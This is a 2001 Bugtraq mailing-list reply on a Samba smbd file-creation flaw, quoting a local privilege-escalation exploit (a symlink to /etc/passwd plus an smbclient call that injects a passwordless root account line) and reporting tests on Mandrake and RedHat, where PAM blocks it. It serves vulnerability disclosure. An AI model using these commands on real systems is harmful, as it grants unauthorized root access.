[21181] in bugtraq
Re: smbd remote file creation vulnerability
daemon@ATHENA.MIT.EDU (maniac@localhost.sk)
Mon Jun 25 12:29:29 2001
From: maniac@localhost.sk
Date: Mon, 25 Jun 2001 00:14:02 +0200
To: bugtraq@securityfocus.com
Cc: Michal Zalewski <lcamtuf@bos.bindview.com>
Message-ID: <20010625001401.A2738@localhost.sk>
Mail-Followup-To: bugtraq@securityfocus.com,
Michal Zalewski <lcamtuf@bos.bindview.com>
Mime-Version: 1.0
Content-Type: text/plain; charset=us-ascii
Content-Disposition: inline
In-Reply-To: <Pine.LNX.4.21.0106232315510.10682-100000@nimue.bos.bindview.com>; from lcamtuf@bos.bindview.com on Sat, Jun 23, 2001 at 11:24:26PM -0400
> Exploit:
>
> This is the scenario of local privilege escalation attack against
> RedHat 7.x installation:
>
> $ ln -s /etc/passwd /tmp/x.log
>
> $ smbclient //NIMUE/"`perl -e '{print "\ntoor::0:0::/:/bin/sh\n"}'`" \
> -n ../../../tmp/x -N
>
> ...where 'NIMUE' stands for local host name (few error messages
> should be returned).
>
> $ su toor
> #
Hi,
Mandrake 7.1 (Mandrake 8.0 and RedHat6.2) defaultly logs here:
/var/log/samba/log.%m
I replaced it with /var/log/samba/%m.log and used your exploit, which
worked - into /etc/passwd was appended also line:
toor::0:0::/:/bin/sh
But until there was that two spaces onto begining of line, it was
impossible to su to that account, this is error message:
Jun 24 23:28:55 localhost PAM_pwdb[23844]: check pass; user unknown
I tried to insert \r after the first \n, but unsucessfully.
I'm using pam-0.72-7mdk.
This versions of PAM also don't permit spaces on begining of line:
pam-0.72-20.6.x (Redhat6.2)
pam-0.74-6mdk (Mandrake8.0(
Maybe sshd without PAM support and permitting empty password may be
'vulnerable' on such systems.
maniac
